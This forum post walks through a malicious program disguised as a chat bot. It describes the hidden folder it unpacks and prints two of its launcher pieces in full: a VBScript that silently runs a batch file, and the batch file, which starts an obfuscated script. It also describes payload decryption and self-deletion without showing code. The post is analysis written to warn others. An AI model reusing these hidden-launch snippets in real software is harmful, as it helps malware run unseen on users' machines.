Okay Ainille sent me a copy of that appearantly evil chat bot.
Well... let's get an idea of what this does and why it is actually bad. Shall we?
When run, it will unpack an embedded archive into a hidden folder at %userprofile%\j
gayw\.
<-- gay!!This folder then contains the following files:
56554.cmd
77645.vbs
KmHrdAQQB.VQK
mVpqAeG.exe
UFxo.KTP
VQShAqBQEs.QPSIt then shows a black DOS window and does seemingly nothing.
However, it secretly executes the 77645.vbs. That file contains:
const Hidden = 0
const WaitOnReturn = true
File ="""C:\Users\YourUsernameHere\jgayw\56554.cmd"""
set WshShell = CreateObject("WScript.Shell")
WshShell.Run file, Hidden, WaitOnReturn
wscript.quitNote how it will already contain the full user path.
This basically executes the 56554.cmd file. Contains this:
@echo off
cd %userprofile%\jgayw\
start mVpqAeG.exe "KmHrdAQQB.VQK"This executes the KmHrdAQQB.VQK file using mVpqAeG.exe. I've found that it uses
this framework / scripting language.
That .vqk is actually a plaintext script file filled with 2 million lines of spam. Bad attempt at obfuscation, because if you remove them all with a simple regex find/replace you get this:
51,000 characters. Can't put in a post.
Read the script here.This script does some bad things. Well, it would, I guess, if you run it outside of a sandbox. If you care what then read it.
The VQShAqBQEs.QPS (referenced by the script) contains this:
[3797560]
9869251=2973211
[3508157]
9366118=9034676
[4523506]
4523506=jgaywThis appears to be some sort of simple config file.
However, the
actually bad thing is the second thing this script can do.
It decrypts the UFxo.KTP, resulting in
THIS THING and executes it.
Oh, and it also is able to tracelessly delete itself if told to.
>>disable LSD's key
